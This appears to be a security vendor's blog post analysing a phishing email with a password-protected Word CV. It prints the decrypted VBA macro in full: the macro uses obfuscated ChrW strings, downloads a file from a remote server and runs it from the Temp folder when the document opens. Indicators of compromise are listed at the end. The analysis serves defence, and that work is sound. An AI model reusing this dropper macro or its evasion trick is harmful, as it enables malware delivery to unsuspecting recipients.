Malicious Activity: Would You Hire a Hacker?
Would you? One of our client’s HR department received an email containing a CV. The email stated that the attached word document is password protected and provided the password inside the email. The user has to enter the password manually, a process that can cause issues to an automated system that check the file for malicious activity.
After the user enters the password the file becomes a common attack of a malicious macro code that executes malicious commands. The macro code is also encrypted making the detection even harder.
Perception Point’s file decryption feature that extracts the malicious code from an encrypted file. The code downloads a malicious exe to the temp folder from a server and activates it.
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Document_Open() Dim WinHttpReq As Object Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password" WinHttpReq.send Dim first5 As String Dim second5 As String Dim last5 As String first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101) second5 = ChrW(97) & ChrW(109) last5 = first5 + second5 xyuhjnx = WinHttpReq.responseBody If WinHttpReq.Status = 200 Then Set oStream = CreateObject(last5) oStream.Open oStream.Type = Val("1FFF") oStream.Write WinHttpReq.responseBody Dim first6 As String Dim last6 As String first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) last6 = first6 oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF") oStream.Close End If Call Shell(Environ("Temp") + "\qwerty2.exe", 0) End Sub
IOC’s
C2 Server IP - 209.141.55.226 qwerty2.exe - 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (SHA-256) VT score 12/69 2019-02-21 15:13:33 UTC
Learn more about how we protect our clients against malicious activity here.